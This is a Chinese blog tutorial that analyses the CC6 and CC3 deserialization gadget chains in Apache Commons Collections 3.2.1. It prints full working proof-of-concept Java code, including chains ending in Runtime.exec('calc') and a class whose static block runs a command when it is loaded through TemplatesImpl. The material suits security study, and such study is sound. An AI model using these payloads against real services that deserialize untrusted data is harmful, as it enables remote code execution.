Java反序列化(三)——CC6、CC3

已于 2024-08-14 17:03:12 修改
阅读量920 收藏 10
点赞数 17
分类专栏: Java反序列化 文章标签: java 开发语言
于 2024-08-14 17:03:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzy03210321/article/details/141168443
版权

0 背景

白日梦组长投稿视频-白日梦组长视频分享-哔哩哔哩视频 (bilibili.com)

实验环境

Java:1.8.0_65

IDEA:2022

commons-collecetions:3.2.1

1 CC6

        ysoserial中的CC6调用链如下:最下面的还是CC1中的LazyMap.get()。transform那里和CC1是代码一样的,只不过ysoserial这里表述不同而已。CC6最大的特点是不受JDK版本影响,像CC1在1.8.0_71后就修该了AnnotationInvocationHandler.readObject(),里面不在调用setValue()。

        ​

1.1 分析调用链——编写POC

        LazyMap.get()方法如下。

        这里每个key只能使用一次,因为进入if逻辑后,就会调用map.put(),下次就不能用了。

1.1.1 TiedMapEntry.getValue()调用了LazyMap.get()

        结合前述代码需要满足条件:TiedMapEntry.map = LazyMap实例  &&  TiedMapEntry.key not in LazyMap.map.keySet().

        要满足第二个条件,需要确保TiedMapEntry的key是第一次出现。在这里,会消耗TiedMapEntry.key加入到LazyMap.map中

1.1.2 TiedMapEntry.hashCode()调用了TiedMapEntry.getValue()

        这里直接调用getValue()了,所以结合前述代码需要满足条件:TideMapEntry.map = LazyMap实例  &&  TideMapEntry.key not in LazyMap.map.keySet().

        由于这两步都是TiedMapEntry被类调用,所以选择分析完hashCode后在把LazyMap装进TiedMapEntry。TideMapEntry可以直接new实例,并控制其内部的map和key。

        代码如下:

1.1.3 HashMap.hash()调用了TiedMapEntry.hashCode()

        需要满足条件:hash传入参数 key = TiedMapEntry

1.1.4 HashMap.put()调用了HashMap.hash()

        需要满足条件:put函数传入参数 key = TiedMapEntry

        put中key = TiedMapEntry就能满足hash中 key = TiedMapEntry。

        从这里看,其实不用将TiedMapEntry装入HashMap中,只需要在执行HashMap.put(key, null)的时候,key=TiedMapEntry就可以。

1.1.5 HashSet.readObject()调用了HashMap.put()

        从这里可以看到至少要满足:e=TiedMapEntry.

        至于条件:HashSet.map=HashMap 不满足也可以,因为HashSet.map的类型本来就HashMap的。在这里只要确保e就行。

        这里还有其他的代码逻辑可能导致走不到map.put,但由于已经到了readObject,我个人更喜欢直接开始正向调试readObject。

        如何把e=TiedMapEntry呢?先看HashSet的构造函数和变量。HashSet可以通过反射或者add方法来赋值。此外,这里的e,初步猜测可以用add(TiedMapEntry),因为add()里面就调用了put,和readObject中调用的形式比较相近。

public class HashSet<E>
    extends AbstractSet<E>
    implements Set<E>, Cloneable, java.io.Serializable
{
    static final long serialVersionUID = -5024744406713321676L;

    private transient HashMap<E,Object> map;

    private static final Object PRESENT = new Object();

    public HashSet() {
        map = new HashMap<>();
    }

    public HashSet(Collection<? extends E> c) {
        map = new HashMap<>(Math.max((int) (c.size()/.75f) + 1, 16));
        addAll(c);
    }


    public HashSet(int initialCapacity, float loadFactor) {
        map = new HashMap<>(initialCapacity, loadFactor);
    }

    public HashSet(int initialCapacity) {
        map = new HashMap<>(initialCapacity);
    }


    HashSet(int initialCapacity, float loadFactor, boolean dummy) {
        map = new LinkedHashMap<>(initialCapacity, loadFactor);
    }

    public boolean add(E e) {
        return map.put(e, PRESENT)==null;
    }

    1.2 正向调试    

        根据上述分析,写了以下的POC。需要注意的是,在序列化时,hashSet.add调用过程中,会调用put,进而走完后序链条,把key消耗掉,需要将加入key去除。

       成功走进逻辑。 

1.3 另外一条CC6链——HashMap.readObject()

        为什么HashMap.readObject也会触发调用链呢?这里和URLDNS很像,入口类那里和URLDNS这条链是一样。

        GadGet:
            java.util.HashMap.readObject()
                java.util.HashMap.hash()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
                    org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
                        org.apache.commons.collections.map.LazyMap.get()
                            org.apache.commons.collections.functors.ChainedTransformer.transform()
                            org.apache.commons.collections.functors.InvokerTransformer.transform()
                            java.lang.reflect.Method.invoke()
                                java.lang.Runtime.exec()

        看一下HashMap.readObject的代码,当把HashMap的key是tideMapEntry,那就能走完调用链条了。而刚好上面我写的POC中,HashMap的key就是tideMapEntry。所以这里会从不同的Source入口类提前触发hash()往后的调用链

        另一条链最终的POC如下:

package CCTest;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class CC6 {

    public static void main(String[] args) throws Exception {

        Transformer[] tranformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
//
        ChainedTransformer chainedTransformer = new ChainedTransformer(tranformers);

        HashMap hashMap = new HashMap();
//        //        hashMap.put("value", "value");
        Map<Object, Object> lazymap = LazyMap.decorate(hashMap, new ConstantTransformer(1));
//
        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "lazymapValue");

        HashMap hashMap1 = new HashMap();
        hashMap1.put(tiedMapEntry, "tiedMapEntryValue");
        lazymap.remove("lazymapValue");

        Field factory = LazyMap.class.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(lazymap, chainedTransformer);

        serialize(hashMap1);

        unserilize("cc6-2.bin");

    }


    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("cc6-2.bin"));
        oos.writeObject(obj);
    }
    public static Object unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        Object obj = ois.readObject();
        return obj;
    }
}

2 CC3

       CC1和CC6是通过Transformer来反射调用Runtime来执行命令,CC3则是通过Transformer去执行类加载的调用链,进而加载恶意类执行静态代码来执行命令(不需要Runtime反射调用)。所以,CC3的前半条链和CC1/CC6是一样的,之后Transformer后的有所不同。

        java.lang.ClassLoader.defineClass()是类加载过程中真正将字节码转换为class源类的函数,该方法有多个重载,可直接定位到639行的defineClass。这个是protected的方法Transformer没办法执行该方法,因为 setAccessible 返回值是void,无法链式调用。

2.1 寻找类加载链

2.1.1 TemplatesImpl$TransletClassLoader.defineClass(b)方法方法调用了ClassLoader.defineClass(b)

        这里的方法是默认访问权限,继续网上找。而且需要满足这里的 byte[] b可控,这里就是传入类字节的变量。TemplatesImp继承了Serializable接口。

2.1.2 TemplatesImpl.defineTransletClasses()调用了TemplatesImpl$TransletClassLoader.defineClass(b)

        这里先需要满足条件:_bytecodes[i] = evilClassByteCode

        但这里代码只进行了类加载,并没有初始化,这样是没办法执行static中的代码。同时该方法时private的。需要进一步往下找,找会创建实例的,创建实例的过程会一同初始化。

        由于这里没有初始化,所以defineTransletClasses函数里的代码逻辑必须成功走完,不能报错,否则中断流程,就是加载了类,没办法执行代码。因此还需要满足其他条件,这里等调试的时候在分析吧。

2.1.3 TemplatesImpl.getTransletInstance()调用了emplatesImpl.defineTransletClasses()

        只需要满足条件:_class == null && _name != 0

        但还是private,继续找。

2.1.4 TemplatesImpl.newTransformer()调用了TemplatesImpl.getTransletInstance()

        是一个public方法,并且这里不需要满足什么条件。所以类加载的调用链找到了。

        综上目前需要满足条件:_bytecodes[i] = evilClassByteCode  && _class == 0 && _name != 0

2.1.5 调试

        可以先调用newTransformer看能不能成功加载,如果成功,再用Transformer执行也不迟。

        先创建一个恶意类:

import java.io.IOException;

public class CC3Calc {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException o){
            throw new RuntimeException(o);
        }
    }
}

        下面是TemplatesImpl中的变量,这里直接通过反射来编写,然后调试,从前面的分析,这里重点是在defineTransletClasses中的逻辑。

private static String ABSTRACT_TRANSLET = "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet"
private String _name = null;
private byte[][] _bytecodes = null;
private Class[] _class = null;
private int _transletIndex = -1;
private transient Map<String, Class<?>> _auxClasses = null;
private Properties _outputProperties;
private transient TransformerFactoryImpl _tfactory = null;

        代码如下:

        问题1:_tfactory空指针异常。但实际中在反序列中,这里并不会产生问题,这是一个transien变量。

        问题1解决:给_tfactory赋一个TransformerFactoryImpl类就行

        Field tfactory = c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());

        问题2:_auxClasses空指针和_transletIndex=-1。

        问题2解决:其实从这里的代码逻辑上看,只要superClass.getName().equals(ABSTRACT_TRANSLET)成立,_transletIndex就会赋值为i(>0),这样就不会走_auxClasses的逻辑,下面<0的报错也不会走。superClass.getName().equals(ABSTRACT_TRANSLET)的意思就是让被加载类的父类等于ABSTRACT_TRANSLET常量.

2.2 完整POC

        先观察TemplatesImpl.readObject(),只需要设置_name和_bytecodes就行。

        代码:

package CCTest;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.HashMap;
import java.util.Map;

public class CC3 {
    public static void main(String[] args) throws Exception {

        byte[] evil = Files.readAllBytes(Paths.get("CC3Calc.class"));
        byte[][] codes = {evil};

        TemplatesImpl templates = new TemplatesImpl();
        Class c = templates.getClass();
        Field name = c.getDeclaredField("_name");
        name.setAccessible(true);
        name.set(templates,"a");

        Field bytecodes = c.getDeclaredField("_bytecodes");
        bytecodes.setAccessible(true);
        bytecodes.set(templates, codes);

        Field tfactory = c.getDeclaredField("_tfactory");
        tfactory.setAccessible(true);
        tfactory.set(templates,new TransformerFactoryImpl());
//        templates.newTransformer();

        Transformer[] tranformers = new Transformer[]{
                new ConstantTransformer(templates),
                new InvokerTransformer("newTransformer", null, null)
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(tranformers);

        HashMap hashMap = new HashMap();
        hashMap.put("value", "value");
        Map<Object, Object> transformedMap = TransformedMap.decorate(hashMap, null, chainedTransformer);

        Class aihClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor aihConstructor = aihClass.getDeclaredConstructor(Class.class, Map.class);
        aihConstructor.setAccessible(true);

        Object o = aihConstructor.newInstance(Target.class, transformedMap);
        serialize(o);
        unserilize("cc3-1.bin");
    }

    public static void serialize(Object obj) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("cc3-1.bin"));
        oos.writeObject(obj);
    }
    public static Object unserilize(String filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));
        Object obj = ois.readObject();
        return obj;
    }
}

        CC3后半段类加载链:

ChainedTransformer.transform():
  InvocationTransformer.transform()
    TemplatesImpl.newTransformer()
      TemplatesImpl.getTransletInstance()
        TemplatesImpl.defineTransletClasses()
          TemplatesImpl$TransletClassLoader.defineClass()
            ClassLoader.defineClass()

2.3 ysoseril中的CC3多了两步

ChainedTransformer.transform():
  InstantiateTransformer.transform()
  getConstructor(iParamTypes).newInstance(iArgs)
    TrAXFilter.TrAXFilter(template)
      TemplatesImpl.newTransformer()
        TemplatesImpl.getTransletInstance()
          TemplatesImpl.defineTransletClasses()
            TemplatesImpl$TransletClassLoader.defineClass()
              ClassLoader.defineClass()

        (1)TrAXFilter类的有参构函数中,会调用newTransformer()

        (2)InstantiateTransformer.transform(input)中,会反射通过Constructor创建input的实例。

        所以这里还要多满足两个条件:input=TrAXFilter && templates=TemplatesImpl && iParamTypes=TemplatesImpl.class && iArgs=TemplatesImpl实例。

        最终POC:在上面的POC上修改Tranformer[]就行。

安全知识搬运工
关注
  • 17
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CC6.rar_CCU6_CCU6 PWM_xc866_高手网6xc cc
07-14
xc866的CCU6模块的使用例程,输出六路PWM脉冲,
9a3b2ddcf0cc6f43d099
03-19
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 ...数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) 部署说明 ...
TI_CC6_编译环境安装指南和使用说明
09-20
TI CC6.0,全称为Texas Instruments Code Composer Studio (CCS) 6.0,是一款由德州仪器(TI)推出的集成开发环境(IDE),专为嵌入式系统开发者设计,特别是针对TI的微处理器和微控制器。这个环境集成了代码编辑、...
treinaweb-java-web-fundamentos:TreinaWeb的“ Java-Web基础知识”课程中生成的代码存储库
04-30
TreinaWeb:“ Java-Web基础... 第3.1课:创建Java Web项目 61e3bd2718edc2725b7eb035e6716f3260e283a1 第3.3课:与Servlet的首次联系 9d625ee2d32bf8b3c8e1392f24cea98617a2037f 第3.4课:重写Servlet的service()
学英文视频播放器 flash cc6 as2 编辑
03-04
压缩包内两个flash的EXE文件(分别横屏、竖屏...播放器使用flash cc6 As2编辑。 允许用户添加视频,修改或创建 xml 格式索引文件,供播放器选择加载。 XML文件的格式、编辑修改方法在压缩包的“注释”中有详细描述。
16 个超级实用的 Java 工具类
01-06
Java中,工具类定义了一组公共方法,这篇文章将介绍Java中使用最频繁及最通用的Java工具类。以下工具类、方法按使用流行度排名,参考数据来源于Github上随机选取的5万个开源项目源码。 一. org.apache.commons.io....
phonegap-phonegap-1.0.0-0-g80cc6dd.zip
09-21
这种开发方式极大地降低了开发多平台应用的门槛,因为开发者只需要熟悉Web开发即可,而不需要学习多种原生平台的开发语言,如Objective-C(iOS)、Java(Android)等。 在“phonegap-phonegap-80cc6dd”这个压缩包...
我教你学之系统性能优化注册表修改实例(3)
09-16
2. **屏蔽插件:** 例如,对于3721插件,找到`{B83FC273-3522-4CC6-92EC-75CC86678DA4}`,并屏蔽之。 3. **其他插件:** 对于CNNIC、POPO、中文邮、百度等插件,同样可以通过屏蔽相应的注册表键来防止其自动加载。 ...
678c7caa26d7463ea238530706a16cc6.jpeg
06-18
美工素材,美工素材
69382746f9c695cc6c978726bc922e41:应用程序 ID 11153
05-30
4. **样式化标签**:如和用于图形绘制和矢量图展示,CSS3提供了更多的动画和过渡效果,增强视觉体验。 5. **响应式设计**:HTML5的标签(如视口属性)和媒体查询使得网页能适应不同设备的屏幕尺寸。 6. **Web组件*...
完美支持Windows XP SP3的风格包
09-13
【标题】"完美支持Windows XP SP3的风格包"揭示了这个资源是专门为Windows XP Service Pack 3(SP3)设计的一种桌面主题或风格包。Windows XP SP3是微软公司于2008年发布的Windows XP操作系统的最后一个重大更新,它...
CC6开发应用教材基础篇
08-25
CC6开发应用教材基础篇》是一本深入探讨虚拟现实技术及其在LYINUX平台上的应用的教程。本书从虚拟现实的定义出发,介绍了网络与虚拟现实技术的发展历程,以及WEB3D技术的重要地位。在第二章中,作者详细阐述了2D与...
游戏战报保存服务器-使用类似kafka文件格式
06-07
使用kafka文件格式,每秒写入速度在60M/s左右,固态硬盘写入速度更高,主要内存占用集中在pagecache上面,对堆的占用极少 rocketmq以及kafka都使用这种方式来压榨文件性能,仅仅缺少rocketmq里面的锁定内存,方式...
4594619f-b2a5-48a4-b54b-80e0eb2cc6bb.zip
最新发布
06-20
3. **ER模型(实体-关系模型)**:设计阶段可能会用到ER模型,它将现实世界中的实体、关系和属性可视化,帮助设计数据库的逻辑结构。 4. **数据库设计**:包括需求分析、概念设计(ER图)、逻辑设计(转换为表和...
982f53cc6c574316b8a74f60b83c94d7_abaqus提取应力应变_
09-30
标题 "982f53cc6c574316b8a74f60b83c94d7_abaqus提取应力应变_" 暗示了这是一个关于ABAQUS软件中如何提取应力和应变数据的主题。ABAQUS是一款广泛应用于工程领域的高级有限元分析软件,能够模拟复杂的力学行为,包括...
Django3.0 + Python3的预算管理系统源码
04-20
【标题】"Django3.0 + Python3的预算管理系统源码" 描述了一个使用Python3和Django3.0框架构建的预算管理系统的源代码实现。这个系统可能包括了全面的预算规划、跟踪、报告和分析功能,帮助用户有效地管理财务预算。...
CSS3实现线性渐变用法示例代码详解
11-19
【CSS3线性渐变详解】 在Web设计中,CSS3的线性渐变功能为开发者提供了丰富的视觉效果,能够创建平滑的颜色过渡,适用于背景、边框等元素。线性渐变支持多种浏览器,包括Firefox、Chrome、Microsoft Edge、Safari...
环形星星嵌套图示.pptx
09-26
环形星星嵌套图示.pptx,436c6d41767cc6c.pptx
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
12-09
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
MySQLIntegrityConstraintViolationException: Duplicate entry '8a83d99058cc6e000158cc86540f0008' for key 'l_rlic_doc_acceptance.PRIMARY'
07-11
这个错误提示意味着在尝试插入一条数据时,违反了唯一性约束。根据错误提示信息,出现了一个重复的主键值 '8a83d99058cc6e000158cc86540f0008',该值已经存在于 'l_rlic_doc_acceptance' 表的 'PRIMARY' 键中。 要解决这个问题,你可以执行以下操作之一: 1. 检查数据源:确保你要插入的数据源中没有重复的主键值。可以通过查询数据库或者检查数据源的逻辑来确认。 2. 更新已存在的记录:如果你想更新已存在的记录而不是插入新记录,可以使用 UPDATE 语句来更新现有记录。 3. 生成新的主键值:如果你想插入一条新的记录,但是遇到了重复的主键值,可以考虑生成一个新的唯一标识符作为主键值,以确保唯一性约束得到满足。 请注意,在执行任何更改之前,请备份你的数据以防止意外数据丢失。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值